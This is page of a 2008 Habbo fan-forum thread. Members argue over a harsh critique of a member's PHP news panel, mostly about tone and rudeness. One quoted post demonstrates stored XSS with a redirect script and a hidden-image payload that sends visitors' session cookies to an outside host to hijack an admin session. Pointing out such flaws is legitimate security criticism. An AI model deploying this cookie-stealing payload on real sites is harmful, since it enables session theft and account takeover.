Discover Habbo's history
Treat yourself with a Secret Santa gift.... of a random Wiki page for you to start exploring Habbo's history!
Happy holidays!
Celebrate with us at Habbox on the hotel, on our Forum and right here!
Join Habbox!
One of us! One of us! Click here to see the roles you could take as part of the Habbox community!


Page 4 of 7 FirstFirst 1234567 LastLast
Results 31 to 40 of 63
  1. #31
    Join Date
    Jun 2008
    Location
    Manchester
    Posts
    766
    Tokens
    0

    Default

    Quote Originally Posted by Dentafrice View Post
    Very good protection against XSS! Very much..





    ---------------------------------------

    Back to the XSS thing.. so now that we've proved it has XSS vulnerabilites.. how easy is it to take over the entire panel.. now that the "Latest News" is shown to anyone who views the panel.. logged in or not..

    This is easy..



    But what about something like this?

    Code:
    <script>window.location = "http://www.google.com";</script>
    Of course redirecting it to a much.. how can I say.. annoying? Site would be just as easy..

    Or we could get even more advanced (if the panel had user levels).. and begin stealing admin's sessions..

    Code:
    <script type="text/javascript">
    var div = $('header');
    var element = document.createElement('img');
    element.src="http://mysite.com/test.php?cookie="+encodeURI(document.cookie);
    element.style.display = "none";
    div.appendChild(element);
    </script>
    How about something like that? Now we have the user's PHPSESSID and can easily "become them".. because all you check is the $_SESSION['username'].. nothing else..

    how secure..

    0.5/10

    - Caleb
    It's a news panel not a forum, normal user aren't supposed to be able to post news at all which is probably why there's no way of registering. Unfortunately there's no way of admins to register as well apart from md5ing their own password and adding themselves by phpMyAdmin. There's quite a few bad things about this panel, but there isn't an XSS risk where you pointed it out.
    Last edited by Jxhn; 20-12-2008 at 02:45 PM.

  2. #32
    Join Date
    Mar 2008
    Posts
    5,108
    Tokens
    3,780

    Latest Awards:

    Default

    Quote Originally Posted by Excellent2 View Post
    I didn't say you didn't point out where he went wrong but there was no need to be so abusive and arrogant.

    I didn't say anything about you helping him with his coding but when you're insulting him and his project like that it's not right. I don't get how I have ego issues? You should look at your posts and then tell me has the ego. Atleast now I can tell what is right and what is wrong.

    Granted I'm not one to stop you but if you really gave a damn about his project you should stop using childish comments like this:




    If thats not being a jackass I don't know what is? You started somewhere once and you've developed into one of them egotistical, arrogant people who now think they're better than anybody in anyway possible. Don't think by that I'm saying you're a bad coder because if I did, I'd be lying but I'm sure if you try out a language you don't know and ask for help someone would reply in a much more helpful and mature way.

    Learn to structure your criticism around when you first started.
    When I started coding.. I got the same criticism and "immature" comments that I give now.

    If you can't learn to take criticism and rude posts.. you're not going to make anything out of yourself.. and you'll develop bad habits.

    I don't think I'm better then anybody in anyway possible.. I know quite a few people who will always be better then me..

    1. Tomm
    2. Mentor
    3. Tomlegend
    4. JustOne
    5. Baving
    6. Jin

    and I treat everyone of those people with the respect they deserve.. and look up to quite a few of them.

    And your comment above..

    I really don't give a damn about his project.. it's not going to get anywhere.. it might be something 'fun' for him to do when he gets home from school..

    I told him what I thought of it, and that's all I'm going to do.

    You can reply with however you like, but my opinion is my opinion.. and if I want to express it in the way that I do, I will continue to do so.. because most of the time.. the criticism that I give.. gets to that person's head.. and makes them a better coder..

    I've been here long enough, seen plenty of projects pass by, and gave countless posts of pure rudeness.. and I see those people today, and those projects.. and they're 95x better at what they're doing then I ever thought they would.

    It all depends on how you take it..

    Apparently you didn't get criticized enough.


    Quote Originally Posted by Jxhn
    It's a news panel not a forum, normal user aren't supposed to be able to post news at all which is probably why there's no way of registering. Unfortunately there's no way of admins to register as well apart from md5ing their own password and adding themselves by phpMyAdmin. There's quite a few bad things about this panel, but there aren't any XSS risks.
    Of course it's not a forum.. no-one ever said it was..

    You're telling me there aren't any XSS risks.. when I just proved it. Say you hired a member of staff.. he posted news.. he got a bit unruly and started hiding some code within his posts..

    He could redirect the site anytime he wanted.. use JS to change anything he wanted on the site..

    That's XSS flaws right there.. so please don't tell me "there aren't any.." when there is.
    Last edited by Dentafrice; 20-12-2008 at 02:45 PM.

  3. #33
    Join Date
    Nov 2005
    Posts
    4,486
    Tokens
    921

    Latest Awards:

    Default

    Why are you flaming Caleb, when he has brought up many SERIOUS issues and areas which anyone could access, with the script?
    If he had never posted then the author wouldn't know where his code has vunerabilities and how to fix them.
    "RETIRED" FROM HABBO(X)

    :¬:

    TOMSPIT / COWLY05


  4. #34
    Join Date
    Sep 2008
    Location
    UK
    Posts
    3,670
    Tokens
    0

    Latest Awards:

    Default

    Quote Originally Posted by Dentafrice View Post
    When I started coding.. I got the same criticism and "immature" comments that I give now.

    If you can't learn to take criticism and rude posts.. you're not going to make anything out of yourself.. and you'll develop bad habits.

    I don't think I'm better then anybody in anyway possible.. I know quite a few people who will always be better then me..

    1. Tomm
    2. Mentor
    3. Tomlegend
    4. JustOne
    5. Baving
    6. Jin

    and I treat everyone of those people with the respect they deserve.. and look up to quite a few of them.

    And your comment above..

    I really don't give a damn about his project.. it's not going to get anywhere.. it might be something 'fun' for him to do when he gets home from school..

    I told him what I thought of it, and that's all I'm going to do.

    You can reply with however you like, but my opinion is my opinion.. and if I want to express it in the way that I do, I will continue to do so.. because most of the time.. the criticism that I give.. gets to that person's head.. and makes them a better coder..

    I've been here long enough, seen plenty of projects pass by, and gave countless posts of pure rudeness.. and I see those people today, and those projects.. and they're 95x better at what they're doing then I ever thought they would.

    It all depends on how you take it..

    Apparently you didn't get criticized enough.
    You're entitled to your opinion and I respect your opinion but I just ask that you try not to belittle everybody because they're not at your level. Is that too much to ask or what?
    Back for a while.

  5. #35
    Join Date
    Mar 2008
    Posts
    5,108
    Tokens
    3,780

    Latest Awards:

    Default

    Quote Originally Posted by TomSpit
    Why are you flaming Caleb, when he has brought up many SERIOUS issues and areas which anyone could access, with the script?
    If he had never posted then the author wouldn't know where his code has vunerabilities and how to fix them.
    Thank you +REP. Finally someone with some sense haha.

    Quote Originally Posted by Excellent2
    You're entitled to your opinion and I respect your opinion but I just ask that you try not to belittle everybody because they're not at your level. Is that too much to ask or what?
    I don't try to belittle everyone.. I never once said I was better at PHP then him (in a direct way). I told him what I thought of the project.. and pointed out the flaws in it.
    Last edited by Dentafrice; 20-12-2008 at 02:48 PM.

  6. #36
    Join Date
    Nov 2005
    Posts
    4,486
    Tokens
    921

    Latest Awards:

    Default

    Quote Originally Posted by Excellent2 View Post
    You're entitled to your opinion and I respect your opinion but I just ask that you try not to belittle everybody because they're not at your level. Is that too much to ask or what?
    He just brought the vunerabilites of the script to attention. He isn't trying to put down the creator.
    "RETIRED" FROM HABBO(X)

    :¬:

    TOMSPIT / COWLY05


  7. #37
    Join Date
    May 2005
    Location
    San Francisco, CA
    Posts
    7,160
    Tokens
    2,331

    Latest Awards:

    Default

    Quote Originally Posted by TomSpit View Post
    He just brought the vunerabilites of the script to attention. He isn't trying to put down the creator.
    "All I can say.. is this is a pile of crap.. it halfway works.. looks like crap.. extremely bad coding.. extremely insecure".

  8. #38
    Join Date
    Nov 2005
    Posts
    4,486
    Tokens
    921

    Latest Awards:

    Default

    Quote Originally Posted by Invent View Post
    "All I can say.. is this is a pile of crap.. it halfway works.. looks like crap.. extremely bad coding.. extremely insecure".
    He's putting down the php coding, not the creator Anyway, I think the creator should be glad Caleb posted, he will learn from his mistakes now.
    "RETIRED" FROM HABBO(X)

    :¬:

    TOMSPIT / COWLY05


  9. #39
    Join Date
    Sep 2008
    Location
    UK
    Posts
    3,670
    Tokens
    0

    Latest Awards:

    Default

    Quote Originally Posted by Dentafrice View Post
    I don't try to belittle everyone.. I never once said I was better at PHP then him (in a direct way). I told him what I thought of the project.. and pointed out the flaws in it.
    No but comments such as "it was laughable" were really not needed were they?

    Quote Originally Posted by TomSpit View Post
    He just brought the vunerabilites of the script to attention. He isn't trying to put down the creator.
    Where did I say that he shouldn't have mentioned the flaws in his script? All I said was there was no need for some of the comments used.
    Back for a while.

  10. #40
    Join Date
    Mar 2008
    Posts
    5,108
    Tokens
    3,780

    Latest Awards:

    Default

    Quote Originally Posted by TomSpit View Post
    He's putting down the php coding, not the creator Anyway, I think the creator should be glad Caleb posted, he will learn from his mistakes now.
    That's right.

    I never once said "you're an idiot you stupid piece of **** you'll never make it anywhere with coding like that you stupid idiot."

    I just said the coding was horrible. If he wants to take it and let it "put him down", so be it.

Page 4 of 7 FirstFirst 1234567 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •